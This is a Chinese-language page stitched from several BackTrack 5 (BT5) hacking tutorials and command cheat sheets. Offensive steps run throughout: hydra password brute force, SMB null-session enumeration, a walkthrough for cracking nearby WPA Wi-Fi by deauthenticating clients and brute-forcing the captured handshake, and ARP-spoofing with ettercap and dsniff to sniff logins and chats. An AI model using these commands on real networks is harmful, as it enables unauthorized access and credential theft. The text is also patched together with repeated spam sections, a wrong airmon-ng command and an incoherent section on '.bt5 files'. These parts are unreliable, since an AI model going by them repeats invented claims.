BT5常用配置命令1
BT5破解实用教程
BT5破解实用教程BT5是一款开源的渗透测试操作系统,它被广泛应用于网络安全领域。
BT5可以帮助安全专业人士进行渗透测试、漏洞评估和渗透攻击。
本文将为您介绍BT5的破解实用教程。
1.安装BT52.更新系统打开终端,输入“apt-get update”命令,更新BT5系统软件包。
3.获取目标网络信息使用“ifconfig”命令获取本地网络接口信息。
使用“route -n”命令查看当前系统的路由表。
使用“nmap”工具扫描目标网络主机。
这些信息将帮助您了解目标网络的拓扑结构和主机情况。
4.使用缺省密码破解如果您已获得目标网络内的一个系统的访问权限,但不知道密码,您可以尝试使用缺省密码破解。
使用“hydra”工具,输入“hydra -l 用户名 -P /usr/share/wordlists/rockyou.txt ftp://目标IP地址”命令进行FTP服务密码破解。
这将尝试使用/usr/share/wordlists/rockyou.txt字典中的所有密码进行破解。
同样的方式也适用于其他服务,如SSH、Telnet和SMTP。
5.使用暴力破解破解密码如果目标系统使用较强的密码,您可以使用暴力破解技术进行破解。
常用的暴力破解工具有“medusa”和“hydra”。
使用这些工具时,请确保您具有合法的授权。
6.网络嗅探与攻击BT5中集成了强大的网络嗅探和攻击工具,如Wireshark、Ettercap 和dsniff。
这些工具可以帮助您捕获目标网络上的数据流量,并进行中间人攻击。
7.无线网络破解BT5也集成了一系列无线网络破解工具,如Aircrack-ng和Reaver。
这些工具可以协助您破解目标无线网络的加密密钥,从而获取网络访问权限。
8.WEB应用漏洞评估使用工具如“Nikto”和“W3af”,您可以对目标WEB应用程序进行漏洞评估。
这些工具可以发现WEB应用程序中的安全漏洞,如文件包含、跨站点脚本和SQL注入。
bt5常用命令全
whois 域名/ip 查看域名的详细信息。
ping 域名/ip 测试本机到远端主机是否联通。
dig 域名/ip 查看域名解析的详细信息。
host -l 域名dns服务器传输zone。
查询信息的网站:扫描nmap:-sS 半开扫描TCP和SYN扫描。
-sT 完全TCP连接扫描。
-sU UDP扫描-PS syn包探测(防火墙探测)-PA ack包探测(防火墙探测)-PN 不ping。
-n 不dns解析。
-A -O和-sV。
-O 操作系统识别。
-sV 服务版本信息(banner)-p 端口扫描。
-T 设置时间级别(0-5)-iL 导入扫描结果。
-oG 输出扫描结果。
操作系统识别:p0f -i eth0 -U -p 开启混杂模式。
xprobe2 ip|域名检测os。
banner获取:nc ip port 检测端口是否打开。
telnet ip port 检测端口是否打开。
wget ip 下载主页。
cat index.html | more 显示主页代码。
q 退出。
windows枚举nmap -sS -p 139,445 ip 扫描windows。
cd /pentest/enumeration/smb-enum nbtscan -f targetIP 检测netbios。
smbgetserverinfo -i targetIP 扫描name,os,组。
smbdumpusers -i targetIP 列出用户。
smbclient -L //targetIP 列出共享。
使用windows:net use \\ip\ipc$ "" /u:"" 开启空会话。
net view \\ip 显示共享信息。
smbclient:smbclient -L hostName -I targetIP 枚举共享。
smbclient -L hostName/share -U "" 用空用户连接。
BT5常用配置命令2
backtrack5学习笔记2012-09-20 0 个评论收藏我要投稿一.信息收集1.DNS 收集a. Dnsenum工具不去rq,随便拿baidu做示范,只是做例子。
命令:root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl ----- -----Host's addresses:__________________ 600 IN A 220.181.111.86 600 IN A 123.125.114.144 600 IN A 220.181.111.85Name Servers:______________ 37423 IN A 202.108.22.220 85599 IN A 220.181.37.10 86400 IN A 220.181.38.10 26299 IN A 61.135.165.235命令:root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl -f dns.txt --dnsserver -o output-dongye.txtBrute forcing with dns.txt:____________________________ 7200 IN CNAME 7200 IN CNAME 600 IN CNAME 7200 IN A 10.11.252.74 7200 IN CNAME 7200 IN CNAME 7200 IN A 10.26.137.29 ......... class C netranges:_____________________________61.135.162.0/2461.135.163.0/2461.135.165.0/2461.208.132.0/24123.125.114.0/24202.108.22.0/24220.181.18.0/24220.181.27.0/24220.181.37.0/24220.181.38.0/24220.181.50.0/24220.181.111.0/24b.dnsmap命令:root@bt:/pentest/enumeration/dns/dnsmap# ./dnsmap -w wordlist_TLAs.txt -c dongye-baidu.csvIP address #1: 61.135.169.105IP address #2: 61.135.169.125IP address #1: 172.22.1.96[+] warning: internal IP address disclosed(警告:内部ip)[+] 165 (sub)domains and 193 IP address(es) found[+] 75 internal IP address(es) disclosed[+] csv-format results can be found on dongye-baidu.csv2.路由信息a. tcptracerouteroot@bt:/# tcptraceroute Selected device eth2, address 10.255.253.200, port 34840 for outgoing packetsTracing the path to (61.135.169.105) on TCP port 80 (www), 30 hops max1 10.255.253.1 2.117 ms 1.793 ms 1.867 ms2 192.168.3.21 24.175 ms 19.071 ms 20.692 ms3 192.168.99.25 1.656 ms 1.327 ms 1.199 ms4 192.168.99.33 1.282 ms 0.662 ms 2.943 ms5 221.212.120.253 1.555 ms 1.488 ms 1.528 ms6 221.212.26.173 7.441 ms 6.794 ms 6.590 ms7 221.212.1.221 2.242 ms 2.097 ms 2.574 ms8 113.4.128.161 4.239 ms 4.384 ms 4.196 ms9 219.158.21.89 23.750 ms 23.656 ms 23.924 ms10 124.65.194.30 23.225 ms 23.251 ms 23.037 ms11 61.148.155.230 23.686 ms 23.858 ms 23.876 ms12 202.106.43.30 23.886 ms 24.292 ms 23.983 ms13 * * *14 61.135.169.105 [open] 26.470 ms 26.066 ms 25.703 ms传统的traceroute很难穿越,但tcptraceroute很容易穿越防火墙。
BT5基本教程
1、主机发现1)Arping由于防火墙的使用等原因,部分主机会出现ping不通的状况。
Arping通过发送Arp request的方式进行测试(直连网络),确定一个特定的ip在线。
直接在终端中输入命令使用。
基本命令格式:arping -c 3 192.168.1.1参数解释:-c 3 发送的Arp请求包的数量192.168.1.1 目标地址如果主机在线,则返回相应的包,反之则提示丢包。
2)Fpingfping可以说是ping功能的增强版,它可以通过轮转方式并行的发出大量ping请求,高效快速的同时ping 多台主机。
图形界面:Applications --> BackTrack --> Information Gathering --> Network Analysis --> Identify Live Hosts--> Fping也可以直接在终端中输入fping。
fping有以下两种用法:①ping文件中的ip地址。
我们首先在根目录下建立一个ip列表,ip.txt,并把ip地址按每行一个的格式写入。
如图:ok,然后是具体的命令:fping -a -s -f ip.txt参数解释:-a 显示存活主机-s 显示最终扫描结果-f ip.txt 读取文件②扫描ip段具体命令:fping -a -s -r 1 -g 192.168.1.1 192.168.1.255参数解释:-r 1 尝试次数-g 192.168.1.1 192.168.1.255 ip段结果:3)Genlistgenlist可以快速的扫描ip段内的存活主机,而且结果呈列表式,因此与fping相比,更简洁明了。
通过直接在终端内运行命令使用。
基本命令:genlist -s 192.168.1.*参数解释:-s 扫描方式192.168.1.* 目标ip段4)Nbtscannbtscan是一个扫描网段内微软主机netbios信息的工具,只适用于局域网,可以显示ip,主机名,用户名及mac地址等。
BT5学习教程
1.BackTrack基础1.1BackTrack概述1.1.1BackTrack发展历史BackTrack是由出品的,是一个linux的便携系统可以放到U盘或者光盘中直接启动,对本身硬盘没有影响,当然也可以本地安装。
BackTrack是非常著名的安全审核工具平台,在封装好的Linux系统里内置了大量的网络安全检测工具。
BackTrack由Auditor和WHAX两种渗透测试平台合并而来,两者都是基于Linux系统的渗透测试平台。
Auditor:全称是Auditor Security Collection,是一种基于Knoppix的Live CD,由Max Moser开发,它内置了超过300种安全工具涵盖安全问题发现,网络和系统安全加固等方面。
它的用户友好性推动了渗透测试的可操作性,并因此引出了BackTrack安全测试平台的构想。
WHAX:以安全任务为中心的Linux发行版,它是由Whoppix(一种基于Knoppix的安全平台)发展而来,当Whoppix发布3.0版本时,它重命名为WHAX以表明它的系统构架从Knoppix更换为了SLAX。
在由安全顾问Mati Aharoni定制开发后,WHAX将它的核心内容调整为了渗透测试。
两者进行了重新整合,精选之后的版本被更名为BackTrack。
从2006年开始推出BackTrack1.0版本以来,之后每年都会推出一个全新版本的BackTrack系统,从BackTrack4.0,它的系统开始基于Ubuntu发行版,最初是基于Ubuntu Linux 8.10.在2011年5月10日,BackTrack推出了它的最新版5.0,代号为“Revolution”。
BackTrack5.0 以Ubuntu Lucid LTS 为基础,其Linux内核版本为2.6.28.BackTrack版本发布历史如下表所示:1.1.2BackTrack功能简介BackTrack作为最享有盛名的信息安全审计及渗透测试平台,其目的是方便人们执行渗透测试及安全任务。
bt5使用教程呢
bt5使用教程-渗透方面2012-08-22 09:54:33 我来说两句来源: 作者:chu收藏我要投稿喜欢渗透,今年8月才开始接触bt5。
看到论坛上有很多帖子,但主要都是讲pj的。
如果单单是pj,对于bt5真的是大才小用了。
所以决定开个帖子讲讲bt5在渗透方面的应用。
这个帖子的主要是根据教主的视频教程,《LiNUX--BT4hei客手册》整理,加以网上资料,也算是我个人的学习笔记了吧,有兴趣的童鞋可以和我一起走进bt5。
(ps:教主的视频教程地址:/playlist/index_6560628.html)一、BT5的u盘安装由于bt5本来就是一个封装好的linux系统(基于Ubuntu),所以安装起来相对简单,主要需要如下工具:1、4g u盘一枚(当然可以更大的,但是不推荐更小的了,原因是官方的bt5iso 包就有2.60G大,再加上你的配置文件,太小的u盘安装后剩余的空间较小,会影响读取速度,直接的后果就是系统会卡。
)2、bt5安装包种子下载地址如下:/downloads/根据自己的需要可以选择32/64位,KDE/GNOME版本进行下载。
3、unetbootin-windows-578用于安装系统。
下载地址:/soft/88566.htmok,准备工作完成,下面开始安装。
首先,将你的u盘格式化为FAT32格式。
然后解压下载的unetbootin-windows-578 ,运行其中的unetbootin-windows-578 .exe,界面如下:安装过程中,会停在第9个文件一段时间,重启电脑,选择u盘启动,就可以进入bt5了二、信息收集1、DNS信息收集1)dnsenumdnsenum的目的是尽可能收集一个域的信息,它能够通过谷歌或者字典文件猜测可能存在的域名,以及对一个网段进行反向查询。
它可以查询网站的主机地址信息、域名服务器、MX record(函件交换记录),在域名服务器上执行axfr请求,通过谷歌脚本得到扩展域名信息(google hacking),提取自域名并查询,计算C 类地址并执行whois查询,执行反向查询,把地址段写入文件。
BT5安装步骤
Backtrack5的安装和初步系统配置(含上网和汉化)1、进入Linux启动界面。
选择Default Text模式启动>Enter2、根据文字界面的提示>输入root>按Enter>输入toor〉输入startx按Enter3、等进入图形桌面,双击桌面上的install,在左边的框架中选择中文(简体),根据提示进行设置,开始安装。
当进度达到99%时,会停留很久,不用管。
4、安装完成后根据提示重新启动。
重启后进入系统需要输入用户名和密码。
默认为root toor,如果需要更改,进入系统后打开终端输入passwd root,输入两次新密码后即可修改。
root@bt:~# passwdEnter new UNIX password: {输入您的新密码}Retype new UNIX password: {确认您的新密码}passwd: password updated successfullyroot@bt:~#5、创建普通用户root@bt:~# adduser username正在添加用户"username"...正在添加新组"username" (1001)...正在添加新用户"username" (1001) 到组"username"...创建主目录"/home/username"...正在从"/etc/skel"复制文件...输入新的UNIX 密码:重新输入新的UNIX 密码:passwd:已成功更新密码正在改变username 的用户信息请输入新值,或直接敲回车键以使用默认值全名[]:房间号码[]:工作电话[]:家庭电话[]:其它[]:这些信息是否正确?[Y/n] yroot@bt:~# cp -rf /root/.kde* /home/usernameroot@bt:~# chown -R username:username /home/usernameroot@bt:~# usermod --groups admin,disk,cdrom,audio username6、Backtrack上网.*关于拨号上网#sudopppoeconf它会出现I found 2ethernet devices:eth0 wlan0,光标选择<yes>按Enter。
Backtrack5安装简单配置
Backtrack5安装简单配置Backtrack5安装简单配置Backtrack5已经发布了几天了,一直没空去下载。
今天下载了并且安装到硬盘中了。
发现系统优化了很多。
最突出得是内核升级到官方最新文档版本2.6.38了。
整体得界面也变得很漂亮了。
不过官方只提供了英文得完美支持。
对于中文有些会出现乱码,没有中文输入法。
对ubuntu11.04进行了阉割,并且加入很多安全测试工具。
因此我为了满足自己工作的需要,我对其进行了简单得一些配置,能够满足自己得日常工作了。
先测试一段时间,看看能否将所有window下得操作移动到linux来操作,等做完详细得计划来决定。
下面我们看看如何配置:1.网络配置这个版本对网卡的支持挺好,驱动自动完成了。
# 这种是配置静态IPifconfig eth0 192.168.1.12/24 # 网卡eth0echo nameserver 192.168.1.1 > /etc/resolv.conf # DNS解析network file:/etc/network/interfaces如果你是DHCP,只要简单执行下面命令ifconfig eth0 dhcp# 无线网络驱动[1]方法一:Applications->Internet->Wicd NetWork Manager 来启动链接无线[2]方法二:/etc/init.d/wicd start为了能保存我们得网卡配置,我们必须将他们设置成开机启动。
执行# 设置有线网络开机自动启动update-rc.d networking defaults# 设置无线自动启动update-rc.d wicd defaults2.SSH 配置# generate SSh keyssshd-generate# start SSH/etc/init.d/ssh start# stop SSh/etc/init.d/ssh stop# set SSH default start at boot.update-rc.d -f ssh defaults3.安装基础语言包安装之前要修改source.lst列表,我们修改成ubuntu官方得源就可以了language-pack-zhlanguage-pack-zh-baselanguage-pack-gnome-zhlanguage-pack-gnome-zh-base依次安装上面语言包。
BT5教程
我们可以把BT5制作成U盘启动(查阅相关资料),或者直接在VM虚拟机中运行(推荐使用9.0或更高版本)
运行BT5后会看见如上图的界面,输入命令startx 进入图形化操作界面
打开虚拟终端
在这我们输入ifconfig命令来查看下BT5是否已经识别到无线网卡,如下图显示Wlan0就是我们的无线网卡
输入:airmon-ng startx wlan0 把无线网卡开启到监听模式
注意:上图中的最后一行(monitor mode enabled on mon0):已经提示我们监视模式已在mon0上启动,以后我们需要调用mon0这参数。
输入如上图中的命令后,进入全信道抓包(关于信道的问题再此不做解释)。
(“-w hj”中hj为自定义参数,可以自行定义,以后的命令会调用此参数)注意:我们在这调用了mon0参数。
抓包的过程如下图
输入如上图中的命令某一个信道的抓包-c 1 就是在1信道抓包-c 2 就是2信道抓包
效果如下图。
在这注意:我们现在进行的抓包,抓到的是无线终端(手机、电脑、平板)和无线路由器的通讯数据包BSSID代表的是无线路由器的MAC ; STATION代表的是无线终端的MAC
复制MAC地址为攻击做准备,攻击是为了让他们断网而重新验证密码,我们就可以抓到握手包了(握手包里有密码相关的信息)!
打开第二个虚拟终端输入以上命令开始攻击(命令中的“-0 2”代表攻击的信道),反复的执行此命令。
直到出现如下图中右上角显示的信息:
WPA handshake :1c:fa:68:d8:47:de 就代表我们抓到了握手包
输入以上命令调用密码字典,开始暴力破解握手包。
bt5命令
backtrack常用命令2015-02-08 0个评论收藏我要投稿这是我在使用backtrack和在wiki常用的命令,希望对兄弟们有用,坛子里日夜研究技术的兄弟们辛苦了,注意身体啊,千万保重!!!基本passwd 修改密码。
挂载本地分区:mount /dev/hda1 /mnt/hda1 挂载。
ls -l /mnt/hda1 显示分区的目录和文件。
挂载windows网络共享:share <user><targetIP><remote share>--输入密码挂载share文件。
ls -l /mnt/share/ 显示内容。
umount /mnt/share 卸载共享编辑文件:nano file.sh 创建文件。
ctrl+x 退出。
y 保存。
enter 写入改变。
chmod 755 file 改变文件权限。
./file.sh 运行脚本编写c程序:gcc -o filename file.c 编译c代码。
./filename 运行c程序。
源码安装软件:tar zxvf program.tar.gz 解压(bz文件是jxvf参数)cd program 进入解压后的目录。
./configure 配置makefile。
make 编译。
make install 安装。
显卡不支持(vmware)fix-vesa使用默认显卡配置。
dpkg-reconfigure xserver-xorg重新配置x服务器。
fix-vesa-vmware使用vmware的显卡驱动。
切换图形界面:dragon 图形界面选择工具。
desktop fiuxbox使用fiuxbox桌面。
quit退出。
网络动态ip:ifconfig eth0 up 打开网卡。
dhclient [eth0] dhcp给一个新的ip。
静态ip:ifconfig eth0 192.168.0.100/24 设置静态ip。
route add default gw 192.168.0.1 设置网关。
BT5 按键规则
BT5 按键规则
BT5按键规则,在 BT5内部,这样的称呼方式是有着严格的命名原则的。
1、新建项目,这里面的新建项目不是真正意义上的新建,而是在一个图片或者一个文档的空白处点右键->新建项目。
2、在工程中,点击 project 菜单下的 new 进入新建文件窗口,可以在左侧的 Project 子菜单下创建多个文件夹。
3、文件夹中有相应的图标表示文件夹所包含的文件类型和数量。
4、在工作区中,点击鼠标右键,选择 Files(文件)-> SaveAsfiledSystem (保存为 bt5)。
5、这时候,文件就会被保存到当前文件夹中,这些文件都将成为 bt5文件。
6、 bt5文件也叫做. bt5后缀的文件,这种文件其实就是一个压缩包,只要解开压缩包,就能看见里边的文件了。
7、 bt5文件的大小并没有固定值,因此,我们需要对 bt5文件进行压缩,压缩的方法很简单,只要在文件夹中选中 bt5文件,然后点击“编辑”菜单下的 Compression 即可完成压缩操作。
8、压缩之后的 bt5文件体积变得非常小,但是,它仍旧占用硬盘空间,如果你想把它删除掉,那么请先将压缩包解压出来,然后再删除。
9、 bt5文件通过网络传输速度比较快,因此,我们还必须考虑 BT5文件的存储问题。
10、 BT5文件最好放置在一个单独的文件夹中,这样才便于管理。
11、 BT5文件的命名规范是:命令名+代号+文件名。
12、 BT5文件的命名规律是:命令名+代码+文件名。
13、 BT5文件的代码就是指每条命令的代码,例如:@ echo off/ f& q; pause 等等。
- 1 -。
明教教主的Backtrack 5 BT5手册
BT5 讲解By: 279944630@1.信息收集2.扫描工具3.漏洞发现4.社会工程学工具5.运用层攻击MSF6.局域网攻击7.密码破解8.维持访问IP设置动态的IP设置:ifconfig eth0 192.168.0.1/24设置IP和子网掩码(马上生效,但重启不保存)route add default gw 192.168.0.254 网关设置echo nameserver 192.168.0.1 > /etc/resolv.conf 设置DNS地址//跟上面功能一样(vi /etc/resolv.conf)/etc/init.d/networking restart 重启网卡静态IP设置:用ifconfig –a 可以查看到你所有的网卡信息,选择你要设置的IP网卡,使用vi或者nano 命令行编辑器来编辑配置文件,我这里用的是vi编辑器。
按“i”键进入编辑状态,在原有的iface eth0 inet dhcp这行前面加上一个#号,注释掉它。
然后换行输入以下信息,平时我们只需要输入address、netmask、gateway等三个信息就可以了,网络地址和广播地址可以不用输入,按“Esc”键推出编辑状态,按“Shift+;”接着输入“wq”保存和退出。
最好使用命令:/etc/init.d/networking restart重启网卡这IP就可以生效了。
Vi /etc/network/interfaces 编辑IP地址设置好后在重启下网卡 /etc/init.d/networking restart 重启网卡第一部分DNS信息收集:首先BT5 要进入这个目录下都是DNS信息收集的几个工具个人感觉Dnsmap 比较强大,它使用google 搜索引擎取额外的名字与子域名非常类似于dnsenum,可以使用内建的“密码字典”来暴力破解子域名,也可以使用用户自定义的字典。
命令举例:./dnsmap.pl 常用参数命令举例:./dnsmap.pl – -w dns.txt –c baidu.csv 扫描保存在baidu.csv 文件里dnsenum的目的是尽可能收集一个域的信息,下载地址:/p/dnsenum/。
bt5下spoonwpa教程
bt5下spoonwpa教程
1.打开BT5的Wicd network manager,在application下的internet中。
选择一个新号较好的AP。
然后看它的properties,打开properties以后继续打开里面的属性看看这个AP的mac地址跟channel。
2.if con fig看看自己的无线网卡的名称,通常是wlan0或者wifi0,后文中依据实际情况运行命令。
3.开启无线监控。
4.由于我们已经选择好了目标,我们就直奔目标AP,開始用BT5对其进行监控
5找到四个Client client的MAC地址,从里面随便选个(最好选择活跃点儿的)。
打开一个新的终端,上一个终端不要关闭,后面还须要用到。
在新终端中输入:aireplay-ng-0 10-a AP’s MAC-c CP s MAC mon0
6.对BT5握手抓到的包进行破解工作。
BT5实用教程(新手必看)
BT5破解实用教程Beini破解wpa实战一启动虚拟机:1. 打开桌面虚拟机图标2. 单击进入下一步3. 接着按进入下一步(可以默认操作)4. 按browse 选择你的镜像文件存放的位置加载beini然后点击下一步进入5.选择linux点击下一步,一直默认到完成,至此虚拟机安装完成。
二、启动虚拟机,打开电源进入beini画面点击ok点击右下角图标,加载无线网卡,再点击connect……就可以加载网卡加载网卡后,此时电脑右下角原先网卡的信号条会显示X 号三、进入beini 抓包1 点击“奶瓶”图标2.点击yes3.点击wlan0进入监听模式4.点击下一步,按照下图的选项选择破解wpa5.点击scan搜索信号(上图)6 点击选择无线信号,这里我们选择cmcc信号,如果没有客户端clients lnformation 的方框下就是空白,现在我们选择的cmcc 是有客户端的信号,然后在选择一下我们要攻击的客户端,后在点击next进入下一步。
6.client mac是我们选择的客户端的mac地址,如果没有客户端这个地方是空的我们在点击start 进入抓包页面。
7.选择系统自带的字典抓包破解password..lst 点击ok8.点击deauth 攻击客户端,使客户端与路由器断开重连抓数据包,用自带的字典破解(上图)9. 上图出现“?”,表示自带的字典没有找到密码,这时我们可以用u盘,导出握手包在xp系统下破解,或者换beini 自带的字典进行破解。
下一步我们换beini自带的字典进行破解四.换beini自带的字典进行破解我们先把自己做好的字典放入U盘,把U盘插入电脑,在beini中打开u盘,点击下面的图标出现下图点击出现在点击出现然后点击bin点击feedingbottlePassword.lst就是自带的字典我们插入u 盘,在找U 盘内的字典点击第7个硬盘标志,让beini加载u盘方法和加载无线网卡一样这里不详述了点击2次点击mntSdal就是刚才插入电脑的u盘点击打开,找到自己做的字典,拖入放在beini自带字典的文件夹,就可以了。
【2018最新】bt5使用指导书-范文word版 (9页)
本文部分内容来自网络整理,本司不为其真实性负责,如有异议或侵权请及时联系,本司将立即删除!== 本文为word格式,下载后可方便编辑和修改! ==bt5使用指导书篇一:bt5使用教程呢bt5使用教程-渗透方面 201X-08-22 09:54:33 我来说两句来源:作者:chu收藏我要投稿喜欢渗透,今年8月才开始接触bt5。
看到论坛上有很多帖子,但主要都是讲pj的。
如果单单是pj,对于bt5真的是大才小用了。
所以决定开个帖子讲讲bt5在渗透方面的应用。
这个帖子的主要是根据教主的视频教程,《LiNUX--BT4hei客手册》整理,加以网上资料,也算是我个人的学习笔记了吧,有兴趣的童鞋可以和我一起走进bt5。
(ps:教主的视频教程地址:/playlist/index_6560628.html)一、BT5的u盘安装由于bt5本来就是一个封装好的linux系统(基于Ubuntu),所以安装起来相对简单,主要需要如下工具:1、4g u盘一枚(当然可以更大的,但是不推荐更小的了,原因是官方的bt5iso包就有2.60G大,再加上你的配置文件,太小的u盘安装后剩余的空间较小,会影响读取速度,直接的后果就是系统会卡。
)2、bt5安装包种子下载地址如下:/retype/zoom/97d1f15c8e9951e79b8927c8?pn=2&x=0&y=582&raww=893&rawh=44 6&o=png_6_0_0_0_0_0_0_892.979_1262.879&type=pic&aimh=239.731243001119 82&md5sum=2a25089207f35bdbde3db3a10c7488b4&sign=6567ab2e9e&zoom=&png= 4017-44803&jpg=0-0" target="_blank">点此查看安装过程中,会停在第9个文件一段时间,重启电脑,选择u盘启动,就可以进入bt5了二、信息收集1、DNS信息收集1)dnsenumdnsenum的目的是尽可能收集一个域的信息,它能够通过谷歌或者字典文件猜测可能存在的域名,以及对一个网段进行反向查询。
BT5教程
虚拟机破解WEP详细教程一.虚拟机安装篇1、双击虚拟机驱动图标几分钟后出现如下图:2、点击出现如下图:3、选择默认的典型安装点击出现如下图:4、选择默认安装路径点击出现如下图:5、默认选择后点击出现如下图:6、点击进行安装,稍后出现如下图:7、双击出现如下图:8、复制Serial 栏中的序编号填写如下图:9、点击进行注册。
10、点击完成安装后出现如下图:11.点击后完成虚拟机驱动安装。
12、虚拟机汉化程序驱动安装点击出现如下图:13、点击下一步选择我同意“许可协议”中的条款后再点击两次下一步选择默认安装路径后出现如下图:14、点击下一步再点是后取消推荐使用的第三方插件的三个选项再次点击下一步完成汉化安装。
二、虚拟机设置篇1、新建虚拟机后点击下一步2、选择典型安装点:3、选择 Microsoft Windows ,4、按是提示虚拟主机名字和要安装的位置(自定)5、选择不使用网络链接点下一步完成。
6、双击选择使用ISO镜像浏览找到BT5.ISO(光盘BT5文件夹里有BT5.ISO)点击打开后确定。
7、点击绿色按钮启动虚拟机出现如下图:8、这里我们点启动虚拟机中的BT5.ISO文件。
三、虚拟机破解篇完成以上的步骤后就开始破解啦1、启动BT5后,按照下图操作(注,进入系统时较慢)直接进入BT5系统,按提示操作.(第一步:双击桌面"minidwep-gtk"进入,第二步:选择无线网卡"Wlan0"和加密方式"WEP",再点"扫描"开始找路由,第三步,选好上边的路由名称,然后点"启动"开始收录数据包,第四步,"Hex key"后面就是密码.)。
BT5硬盘安装(多系统linux+win+BT5)
2
……
修改后……
#vim /etc/fstab
LABEL=/rhel
/
ext3 defaults 1 1
LABEL=/rhelboot
/boot
ext3 defaults 1 2
……
修改前……
#vim /boot/grub/grub.conf
default=0
找到linux的分区,上面的 /dev/sda1 /dev/sda2 /dev/sda3都是linux分区。 2.2、用命令查看你linux分区的labe #e2label /dev/sda1 结果可能显示: /boot #e2label /dev/sda2 结果可能显示: /root
那么就要对这两个分区的label进行修改,label的名称可以自己定。如还你还有home、var等其它linux分区也要修改。只要 分区里没有 / /boot /var /home...这样label就行 修改如: #e2label /dev/sda1 /rhelboot #e2label /dev/sda2 /rhel #e2label /dev/sda7 /susehome 为了确定,再看一下: #e2label /dev/sda1 /rhelboot
到这里,你已经可以启动BT5了,也可以用了。和我最前面提到的安装方法“装”出来的系统是一样的。如果要装到硬盘上。 得要以下步骤:
2、配置: 修改linux分区的label(重要),你要安装BT5到硬盘,那么这个一定要做,不然装不上。因为BT5 要用到 / /boot /var /home...这样label。 2.1、找出你机子里所有的linux分区l: #fdisk -l
BT5硬盘安装(多系统linux+win+BT5)
DX-BT05 4.0模块新手操作指南(1)
DX-BT05 4.0模块新手操作指南一、什么是 BLE 4.0从蓝牙 4.0 开始有两个分支,经典4.0 和 BLE4.0,经典 4.0 就是传统的3.0 蓝牙升级而成,向下兼容。
而BLE4.0 是一个新的分支,不向下兼容。
BLE 是Bluetooth Low Energy低功耗蓝牙的缩写,顾名思义,其功耗较低。
二、哪些设备支持 BLEiOS 平台:Iphone4s,5,5c,5s, Ipad 3,4,mini 等都支持 BLE,无须做 MFI认证。
Android 平台: 装配了蓝牙 4.0 的android 手机并且升级到 Android 4.3或更高的系统。
三、为什么电脑上不支持BLE电脑上如果装配了4.0 双模的蓝牙适配器(双模指经典4.0 和BLE4.0)在硬件上是支持BLE 的,只不过,目前的现状比较尴尬,你找不到配套的软件去驱动这个适配器。
四、为什么在系统蓝牙界面下找不到BLE 设备手机蓝牙默认工作在经典模式下,您需要通过程序来实现搜索,配对连接和通迅的整个过程。
IOS 系统,如果您没有开发者证书请从苹果商店下载 LightBlue ,Android 系统,可以使用我司提供的简易BLE串口助手进行简单的调试,或者通过自己的APP软件测试。
五、B LE 的传输速度BLE 的物理带宽只有1M,实际传输速度在1~6KB 之间。
具体需要根据你使用的环境和项目进行验证,如果有可能,请尽可能的用高一点的波特率,会获得较好的通讯效果。
六、收发字节限制问题我公司提供的 BLE 模块,通过串口接收和发送无字节限制。
在 iOS 系统下,与模块通讯时,目前iOS 系统最大可以支持90字节的发送量,但是研究发现,iOS 内部是分包的,并且分包效率不高,因此请您将超过20个字节的数据进行分包发送,我们的模块在此方面做了优化,效率比 iOS 系统分包提高 10%。
具体请参照我们的iOS 例程。
在Android 系统下,与模块通讯时,每次发送给模块的字节不能超过20字节,如果要发送超20字节的数据,请分包发送。
DX-BT05 AT指令使用方法
BT05 4.0模块AT 指令测试方法
第一步:引出模块的TX,RX,VCC,GND 四个引脚。
模块参考电路:
第二步:准备一个USB 转串口
第三步:将模块和USB 转串口的引脚连接好,并插入到PC 端的USB 口上
第四步:查看端口号
打开设备管理器,带有USB-to-Serial Comm Port 字样。
就是我们要使用的端口。
第五步:在PC 端打开串口助手
配置好端口号,波特率等,默认波特率9600,端口号见上一步,没有校验位,8 位数据位,一位停止位。
每条AT指令后面都要加回车换行(或加/r/n)
第六步:在发送区输入AT(要加回车),点击发送。
在发送区输入 AT(要加回车),点击发送。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
BT5渗透常用命令整理:whois 域名/ip 查看域名的详细信息。
ping 域名/ip 测试本机到远端主机是否联通。
dig 域名/ip 查看域名解析的详细信息。
host -l 域名dns服务器传输zone。
扫描nmap:-sS 半开扫描TCP和SYN扫描。
-sT 完全TCP连接扫描。
-sU UDP扫描-PS syn包探测(防火墙探测)-PA ack包探测(防火墙探测)-PN 不ping。
-n 不dns解析。
-A -O和-sV。
-O 操作系统识别。
-sV 服务版本信息(banner)-p 端口扫描。
-T 设置时间级别(0-5)-iL 导入扫描结果。
-oG 输出扫描结果。
操作系统识别:p0f -i eth0 -U -p 开启混杂模式。
xprobe2 ip|域名检测os。
banner获取:nc ip port 检测端口是否打开。
telnet ip port 检测端口是否打开。
wget ip 下载主页。
cat index.html | more 显示主页代码。
q 退出。
windows枚举nmap -sS -p 139,445 ip 扫描windows。
cd /pentest/enumeration/smb-enumnbtscan -f targetIP 检测netbios。
smbgetserverinfo -i targetIP 扫描name,os,组。
smbdumpusers -i targetIP 列出用户。
smbclient -L //targetIP 列出共享。
使用windows:net use \\ip\ipc$ "" /u:"" 开启空会话。
net view \\ip 显示共享信息。
smbclient:smbclient -L hostName -I targetIP 枚举共享。
smbclient -L hostName/share -U "" 用空用户连接。
smbclient -L hostName -I targetIP -U admin普通用户连接。
rpcclient:rpcclient targetIP -U “”打开一个空会话。
netshareenum 枚举共享。
enumdomusers 枚举用户。
lsaenumsid 枚举域SID。
queryuser RID 查询用户信息。
createdomuser 创建用户访问。
ARP欺骗:ettercap:nano /usr/local/etc/etter.conf配置文件Sniff > Unified sniffing > Network interface: eth0 > OK 设置抓包的网卡Hosts > Scan for hosts (do this two times)扫描网段的主机Hosts > Hosts list 显示主机列表Select the default gateway > Add to Target 1 添加主机Select the target > Add to Target 2 添加主机Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP攻击Start > Start sniffing 开始攻击dsniff -i eth0 监听网卡窃听登录用户密码urlsnarf -i eth0 嗅探http请求msgsnarf -i eth0 嗅探聊天软件的聊天内容driftnet -i eth0 网络管理嗅探图片,音频。
